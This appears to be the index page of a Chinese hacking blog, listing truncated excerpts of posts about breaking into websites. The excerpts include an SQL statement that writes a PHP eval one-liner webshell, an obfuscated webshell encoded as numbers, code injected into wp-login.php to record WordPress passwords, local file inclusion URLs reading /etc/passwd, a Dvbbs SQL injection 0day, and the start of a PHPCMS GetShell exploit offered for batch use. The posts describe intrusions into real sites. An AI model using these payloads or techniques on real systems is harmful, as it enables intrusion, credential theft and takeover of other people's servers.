MSSQL读取文件 命令

这两天一直入侵一个网站 各种提权 包括 mssql:SA mysql:ROOT 主机是星外的  可以看到目标目录 数据库是ASP的 不能插马 无奈找了很多人都木有办法。。。 今天无聊中查看目录 发现有一个高人上传了一个WEBSHELL 在网上找到了办法 发现用MSSQL读取文件的办法 现在分享一下     Use webshell.cc;--(这里是随便选的一个数据库)   drop table ...

- 阅读全文 -

MySQL导出一句话拿WebShell的方法

文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行): Drop TABLE IF EXISTS temp; //如果存在temp就删掉 Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段 Insert INTO temp (cmd) VALUES('<? php eval($_POST[cmd])...

- 阅读全文 -

加密一句话木马

我原也以为这是ASCII码加密过的 73,50,114,133,114,112,130,129,114,45,127,114,126,130,114,128,129,53,47,121,47,54,50,75结果T00LS某牛 全部数字减13,然后十进制解密  <script> var sun=[73,50,114,133,114,112,130,129,114,45,127...

- 阅读全文 -

webshell下记录WordPress登陆密码

webshell下记录Wordpress登陆密码方便进一步社工 原处:http://81sec.com/read.php?115 Wordpress的密码破解可以说基本是没招了,悲剧只好采用记录密码了。 在文件wp-login.php中539行处添加:     // log password $log_user=$_POST['log']; $log_pwd=$_POST['p...

- 阅读全文 -

aspxspy的大马的查看站点做限制

先介绍一下: 1.开发环境VS2008 + C#,兼容FrameWork1.1/2.0,基本实现代码分离,CSS方便参考了phpspy。 2.密码为32位MD5加密(小写) 默认为 admin. 3.全部采用POST方式提交数据,增强了隐蔽性。 4.增强了IIS探测功能,遍历IIS站点信息,绝对路径,多域名绑定,以及IIS账号密码。 5.增加了对指定文件的搜索功能。 6.修正了一些数据库操作的BU...

- 阅读全文 -

Windows 系统密码破解全攻略

此文章已发表在《黑客X档案》2009年第6期杂志上 后经作者发布在博客上,如转载请务必保留此信息! 引子 我一直在想,到底用什么样的方式才能较长时间地控制已经得到了权限的目标呢?留后门,种木马,甚至是Rootkit?留的Webshell痕迹太明显,哪怕是一句话的Webshell,都极容易被管理员清除。放了木马,也容易被有经验的管理员查出来,毕竟现在能做到无声无色的木马还是比较少。早期的是自己建个进...

- 阅读全文 -

一次LINUX低权限提权法

今天旁站拿到一个Apache/2.2.3 (CentOS)的SHELL,进去是LINUX系统,PHP版本5.2.17,MYSSQL的环境,没ASP,.NET组建 先用自带的命令LS,UNAME了下,无显,肯定是设置了PHP.INI。 根目录无写权限,估计就算反弹了也没法CHMOD 777了 先反弹试试 tmp里创建好文件,SHELL目录传马,执行,本地NC监听上线,WHOAMI一下,是WWWROO...

- 阅读全文 -

Dvbbs8.2 sql 版login.asp远程sql注入漏洞

今日在学PHP的时候,一个朋友给我发来一个站,让帮忙做个安检,发现站有个论坛是dvbbs的,呵呵,这可是个漏洞不断的家伙啊。。 最新版本的又暴了远程SQL注入漏洞! 下面提供该漏洞的分析及利用! 【漏洞描述】中国应用最广泛的论坛程序,最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp 【漏洞分析】Login.asp 程序在检查隐藏...

- 阅读全文 -

php伪造本地文件包含漏洞

代码:   <?php $page=$_GET[page]; include($page.'php'); ?>   你可以这样使用 https://www.webshell.cc/index.php?page=../etc/passwd https://www.webshell.cc/index.php?page=../../../etc/passwd http://w...

- 阅读全文 -

phpcms 2008最新0day加批量EXP

玩滥了,丢给大家玩吧。现在命中率还不错哦。直接GETSHELL。一句话密码为c EXP: #!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ PHPCMS Remote Code Inject GetShell Exploit ...

- 阅读全文 -